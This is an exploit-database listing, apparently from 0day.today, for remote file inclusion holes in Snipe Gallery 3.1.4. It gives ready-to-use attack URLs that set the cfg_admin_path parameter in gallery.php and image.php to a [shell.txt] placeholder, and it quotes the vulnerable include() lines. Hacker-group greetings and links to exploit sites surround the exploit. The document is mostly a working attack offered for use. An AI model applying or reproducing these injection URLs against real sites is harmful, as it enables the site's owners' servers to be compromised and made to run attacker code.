[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Snipe Gallery <= 3.1.4 (gallery.php and image.php) RFI Vulnerabilities

Author
Sn!pEr.S!Te
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12318
Category
web applications
Date add
20-05-2010
Platform
php
======================================================================
Snipe Gallery <= 3.1.4 (gallery.php and image.php) RFI Vulnerabilities
======================================================================


   __           __      ___
 __            __  /'__`\        /\ \__  /'__`\                 
/\_\    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __       ___    ___     ___ ___          
\/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\    /'___\ / __`\ /' __` __`\   
 \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/  __/\ \__//\ \L\ \/\ \/\ \/\ \  
  \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\  
   \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/ \/_/\/____/\/___/  \/_/\/_/\/_/
              \ \____/                                           
               \/___/
   
# ----------------------oOO---(_)---OOo-----------------------
# | __ __ |  
# | _____/ /_____ ______/ /_ __ ______ ______ |  
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |  
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |  
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |  
# | Security Sn!pEr.S!Te /____/ 2o1o |  
# ------------------------------------------------------------
     Remote File Inclusion Vulnerability
# -----------------------------------------------------------
----------------------------------------------------------------
Snipe Gallery <==3.1.4 ( gallery.php )
   
----------------------------------------------------------------
#[+] Author : Sn!pEr.S!Te Hacker # 
# [+] Email : sniper-site@HoTMaiL.coM # 
# [+] T34M Sn!pEr.S!Te Hacker # 
# [+] 20-5-2010 #
# [+] Script : Image Galleries » Snipe Gallery
# [+] Download:http://sourceforge.net/projects/snipegallery/files/snipegallery%203/snipegallery%203.1.4/snipegallery-3.1.4.zip/download
# Version: [3.1.4] #
 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
Exploit : snipegallery-3.1.4\ admin \ gallery\ gallery.php
 
http://localhost/snipegallery-3.1.4\admin \ gallery\ gallery.php?cfg_admin_path=[shell.txt ]
 
htpp://127.0.0.1/snipegallery-3.1.4\admin \ gallery\ gallery.php?cfg_admin_path=[shell.txt ]
 
include ($cfg_admin_path."/lib/display_image.php");
 
line : 80
 
Exploit : snipegallery-3.1.5\ image.php
 
http://localhost/snipegallery-3.1.5\ image.php?cfg_admin_path=[shell.txt ]
 
htpp://127.0.0.1/snipegallery-3.1.5\ image.php?cfg_admin_path=[shell.txt ]
 
include ($cfg_admin_path."/lib/display_image.php");
 
line : 117
 
 
web site Favorites my : http://inj3ct0r.com/  & http://www.hack0wn.com/ & http://www.exploit-db.com
 
friend my :liar - sm Hacker -baby hacker -Dr.PaL x HaCkEr -saleh Hacker - ALhal alsab -  
            ThE DarK - abo badr - aStoorh alqssim - Ramad Hacker- h-ex - 
            yousfe - Hiter.3rb - QAHER ALRAFDE - DjHacker - My Heart - Mr.koka-
                      



#  0day.today [2024-12-25]  #